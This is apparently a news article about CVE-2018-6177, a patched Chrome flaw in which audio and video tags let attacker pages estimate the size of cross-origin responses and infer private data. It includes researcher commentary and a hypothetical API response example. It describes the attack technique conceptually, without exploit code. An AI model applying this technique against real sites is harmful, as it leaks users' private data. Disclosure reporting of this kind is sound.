Google has patched a vulnerability in the Chrome browser that allows an attacker to retrieve sensitive information from other sites via audio or video HTML tags.

Ron Masas, a security researcher with Imperva, discovered and reported this issue —tracked as CVE-2018-6177— to Google. The browser maker fixed the security hole at the end of July with the release of Chrome v68.0.3440.75.

The vulnerability can be exploited in older versions of Chrome in situations where an attacker can lure a victim on a malicious site, via malvertising (malicious code inside ads embedded on legitimate sites), or via vulnerabilities on legitimate sites where an attacker can inject and execute code —such as via stored cross-site scripting (XSS) flaws.

Attack leverages audio and video HTML tags

In a write-up published earlier today and shared with Bleeping Computer, Masas explained that the attack scenario requires malicious code that loads content from legitimate sites inside audio and video HTML tags.

Through the use of "progress" events, Masas says he can deduce the size of responses he gets from external sites, and guess various types of information.

Under normal circumstances, this wouldn't be possible because of CORS —Cross-Origin Resource Sharing— a browser security feature that prevents sites from loading resources from other websites, but this attack bypasses CORS.

"In its essence, the bug allows attackers to estimate the size of cross-origin resources using the video or audio tags," Masas told Bleeping Computer via email today.

Attack can retrieve sensitive/protected data from other sites

In his tests, he was able to determine a user's possible age group and gender by prodding the "Audience Restriction" setting on public Facebook posts.

"By manipulating sites like Facebook to reflect user data in the form of big or small responses, it becomes possible to extract valuable data consistently," Masas told us.

But Mike Gualtieri, a security researcher specialized on web security issues, says the attack can be used in more creative ways than collecting data from Facebook users. For example, by targeting corporate backends, intranets, and other enterprise-centric applications.

"Off the shelf systems customized by corporate IT may be the best targets for these types of attacks, as the system internals can be learned by an attacker and could potentially affect all users of the system," Gualtieri told Bleeping Computer today in a private conversation.

"It's very often the case that these systems are more homogeneous based on the logged in user," he said, adding that attackers could prepare attacks focused on exfiltrating sensitive data stored in specific areas of enterprise web apps.

APIs in danger too

Furthermore, Gualtieri believes the attack may also be successful against APIs to which attackers wouldn't normally have access to, but to which the bug allows them to relay requests to.

"It's very feasible this day to find weakly protected web-API's communicating data," Gualtieri told us. "An attacker with enough diligence could work out a group of expected requests by logged in users, and target these API responses."

"For example, let's say a hypothetical stock trading firm has an exposed API endpoint that returns something like:

Request: http[:]//victim/jsonapi/lasttrade/GOOG Response: {"stock" : "GOOG", "lasttrade" : 0, "error" : "not logged in"}

"If the user is logged in the request may be:

{"stock" : "GOOG", "lasttrade" : 100, "error" : false} or, {"stock" : "GOOG", "lasttrade" : 1000, "error" : false}

"So, feasibly you could deduce based on this a range of stock purchased," Gualtieri says.

"This example may sound unrealistic to many, but I've seen too many poorly designed/exposed web API's to know that there are cases similar to this hypothetical example lying around the web," he adds.

Attack similar to Wavethrough, but different

If Masas' attack sounds familiar, it's because it is very similar to a vulnerability disclosed in March, known as Wavethrough (CVE-2018-8235), a flaw affecting Edge and Firefox.

Just like Masas' Chrome bug, Wavethrough used audio and video tags to bypass CORS protection, to load data from other sites, and determine their content.

But this is where the similarity stops.

"The Wavethrough vulnerability used a service worker and 'range' request to extract raw data," Masas told Bleeping Computer. "We, on the other hand, observe the 'progress' events fired from our element to estimate a cross-origin resource size and then use this information to deduce more information about users by exploiting the restriction filters on sites like Facebook."

Jake Archibald, the Google engineer who discovered Wavethrough also says the two attacks are quite different, even if they're carried out via audio and video HTML tags.

"It's very slightly similar, but it's more of a timing attack whereas Wavethrough wasn't," Archibald told Bleeping Computer in a private conversation today. "Wavethrough was an origin-model violation."

The difference is that Wavethrough retrieves whatever data it finds after breaking CORS, while Masas' flaw constantly prods other sites in a flurry of requests trying to guess what the data is.

But while the Chrome bug sounds harder to exploit, it is not.

"The attack is not complex and just takes some preparation," Gualtieri told us, also adding that this constant guessing game doesn't mean that the Chrome bug is limited to targeting one user alone.

"The guessing game may be used to target multiple users at once depending on the target site," Gualtieri said.

So, unless users want to have their web secrets leaked online, updating Chrome to v68.0.3440.75 or later is recommended.